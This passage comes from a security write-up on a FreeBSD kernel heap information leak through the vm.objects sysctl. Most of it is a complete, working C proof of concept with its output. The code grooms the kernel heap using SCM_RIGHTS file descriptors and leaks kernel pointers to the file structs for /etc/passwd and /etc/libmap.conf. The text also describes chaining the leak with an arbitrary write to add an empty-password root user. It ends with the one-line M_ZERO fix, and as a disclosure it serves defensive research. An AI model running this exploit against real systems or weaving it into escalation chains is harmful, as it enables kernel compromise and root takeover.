The elastic object we're interested in leaking is the array of filedescent structs at [7]. By leaking the contents of that array, we can discover a kernel pointer to a live file struct. That's a useful pointer to have if we have an arbitrary write, since we can do interesting things like granting write access to a file we have open for reading (e.g. /etc/passwd or /etc/libmap.conf; see man libmap.conf to spark your imagination).
We can control the size of the malloc through the number of file descriptors we send in our cmsg. Hitting our target is simple:
$ lldb /boot/kernel/kernel
(lldb) target create "/boot/kernel/kernel"
Current executable set to '/boot/kernel/kernel' (aarch64).
(lldb) p sizeof(struct kinfo_vmobject) / sizeof(struct filedescent)
(unsigned long) $0 = 24
We just need to send 24 file descriptors.
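As a quick sanity check on that number, the sketch below computes which descriptor counts land in a given bucket. It assumes sizeof(struct filedescent) is 48 bytes on this 64-bit target, which is inferred from the lldb result above (1184 / 24 truncated, with a pointer-aligned struct) rather than stated in the source; fd_counts_for_bucket is a hypothetical helper.

```c
#include <stddef.h>

struct fd_count_range {
    size_t min;     /* fewest elements that overflow the previous bucket */
    size_t max;     /* most elements that still fit in this bucket */
};

/*
 * Range of element counts n such that prev_bucket < n * elem_size <= bucket,
 * i.e. the array is too big for the previous bucket but fits in this one.
 */
static struct fd_count_range
fd_counts_for_bucket(size_t prev_bucket, size_t bucket, size_t elem_size)
{
    struct fd_count_range r;

    r.min = prev_bucket / elem_size + 1;
    r.max = bucket / elem_size;
    return (r);
}
```

Under that assumption, fd_counts_for_bucket(1024, 2048, 48) gives a range of 22 to 42 descriptors, so 24 (a 1152-byte array) sits comfortably inside the 2048 bucket.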
Proof of Concept
Our final exploitation strategy is:
- Create a connected pair of UNIX domain sockets with socketpair(2).
- Fork and have the child process block on a recv(2).
- Open the file that we wish to disclose the file pointer of.
- Send a message to the child process with an SCM_RIGHTS cmsg containing 24 copies of that file descriptor.
- Once the descriptors have been received by the child, leak memory via the vm.objects sysctl.
Here's a simple PoC:
/*
 * FreeBSD 11.2+ vm.objects sysctl Kernel Heap Information Disclosure PoC
 * 2022-Dec-08
 */
#include <err.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <sys/types.h>
#include <sys/cpuset.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#include <sys/sysctl.h>
#include <sys/user.h>
#include <sys/wait.h>
#include <unistd.h>

static void
pin_to_cpu(size_t n)
{
    cpuset_t cs;

    CPU_ZERO(&cs);
    CPU_SET(n, &cs);
    if (-1 == cpuset_setaffinity(CPU_LEVEL_WHICH, CPU_WHICH_PID, -1,
        sizeof(cs), &cs))
        err(1, "cpuset_setaffinity");
}

static void
child_proc(int sock)
{
    unsigned char ack = 0;

    /* receive the file descriptors */
    if (-1 == recv(sock, &ack, sizeof(ack), 0))
        err(1, "recv");
    /* acknowledge receipt so we know the buffer is free */
    if (-1 == send(sock, &ack, sizeof(ack), 0))
        err(1, "send");
}

#define NFDS (sizeof(struct kinfo_vmobject) / sizeof(struct filedescent))

static const void *
leak_kptr(int fd)
{
    struct kinfo_vmobject buf;
    size_t bufsz = sizeof(buf);
    pid_t child;
    int s[2];
    unsigned char ack = 0;
    struct iovec iov = {
        .iov_base = &ack,
        .iov_len = sizeof(ack)
    };
    unsigned char cmsgbuf[CMSG_SPACE(sizeof(int) * NFDS)];
    struct cmsghdr *cmsgh;
    struct msghdr msgh;
    size_t n;
    int *pfd;

    if (-1 == socketpair(AF_UNIX, SOCK_STREAM, PF_UNSPEC, s))
        err(1, "socketpair");

    switch ((child = fork())) {
    case -1: err(1, "fork");
    case 0:
        /* child will receive the fds */
        close(s[0]);
        pin_to_cpu(0);
        child_proc(s[1]);
        exit(0);
    }

    /* this proc will send the fds */
    close(s[1]);
    pin_to_cpu(0);

    /* set up the cmsg first */
    bzero(cmsgbuf, sizeof(cmsgbuf));
    cmsgh = (struct cmsghdr *)cmsgbuf;
    cmsgh->cmsg_level = SOL_SOCKET;
    cmsgh->cmsg_type = SCM_RIGHTS;
    cmsgh->cmsg_len = CMSG_LEN(sizeof(int) * NFDS);
    for (pfd = (int *)CMSG_DATA(cmsgh), n = 0; n < NFDS; ++n) {
        *pfd++ = fd;
    }

    /* now the msghdr */
    bzero(&msgh, sizeof(msgh));
    msgh.msg_iov = &iov;
    msgh.msg_iovlen = 1;
    msgh.msg_control = cmsgh;
    msgh.msg_controllen = cmsgh->cmsg_len;

    /* send and await ack */
    if (-1 == sendmsg(s[0], &msgh, 0))
        err(1, "sendmsg");
    if (-1 == recv(s[0], &ack, 1, 0))
        err(1, "recv");

    /* now we can leak the buffer */
    bzero(&buf, sizeof(buf));
    sysctlbyname("vm.objects", &buf, &bufsz, NULL, 0);

    /* and reap the child */
    waitpid(child, NULL, 0);

    return *(const void **)(&buf._kvo_qspare[3]);
}

int
main(int argc, char *argv[])
{
    int fd[2];

    /* open some interesting files to leak: */
    if (-1 == (fd[0] = open("/etc/passwd", O_RDONLY)))
        err(1, "open");
    if (-1 == (fd[1] = open("/etc/libmap.conf", O_RDONLY)))
        err(1, "open");

    fprintf(stderr, "[+] /etc/passwd file ptr: %p\n", leak_kptr(fd[0]));
    fprintf(stderr, "[+] /etc/libmap.conf file ptr: %p\n", leak_kptr(fd[1]));

    /* close and re-open to show LIFO behaviour: */
    fputs("[+] close + reopen\n", stderr);
    close(fd[1]);
    if (-1 == (fd[1] = open("/etc/libmap.conf", O_RDONLY)))
        err(1, "open");
    fprintf(stderr, "[+] /etc/libmap.conf file ptr (again): %p\n", leak_kptr(fd[1]));
    return 0;
}
The output of running it:
$ cc -o vm_objects vm_objects.c && ./vm_objects
[+] /etc/passwd file ptr: 0xfffffd00009db6e0
[+] /etc/libmap.conf file ptr: 0xfffffd00009db410
[+] close + reopen
[+] /etc/libmap.conf file ptr (again): 0xfffffd00009db410
Success. Now we can chain that arbitrary write vulnerability to grant us write-access to /etc/passwd, add an empty-password root user and elevate.
What do you mean you don't have an arbitrary write vulnerability...?
Fix
The fix for this bug is super simple: the malloc in vm_object_list_handler just needs to include the M_ZERO flag. This ensures that the memory is zero-initialised and nothing useful will leak back to userland:
--- a/sys/vm/vm_object.c
+++ b/sys/vm/vm_object.c
@@ -2523,7 +2523,7 @@ vm_object_list_handler(struct sysctl_req *req, bool swap_only)
             count * 11 / 10));
     }
 
-    kvo = malloc(sizeof(*kvo), M_TEMP, M_WAITOK);
+    kvo = malloc(sizeof(*kvo), M_TEMP, M_WAITOK | M_ZERO);
     error = 0;
 
     /*
Conclusion
FreeBSD tends to do a decent job of preventing information disclosure bugs these days, but it really depends on the developer remembering to do the right thing at the right time; it's quite error-prone.
We were lucky in this case that the leaky allocation came from the general-purpose heap allocator. For many other types of object, if they originate from a dedicated zone, it's generally not possible to control the leak as easily as we did here.
Even so, these bugs can be fun to play with and don't require a huge amount of effort to make into useful parts of a chain. It's worth finding them.
For context on the effort put into this research: it took around an hour of walking through a bunch of sysctls to find this bug, and writing a PoC took maybe 30 minutes altogether.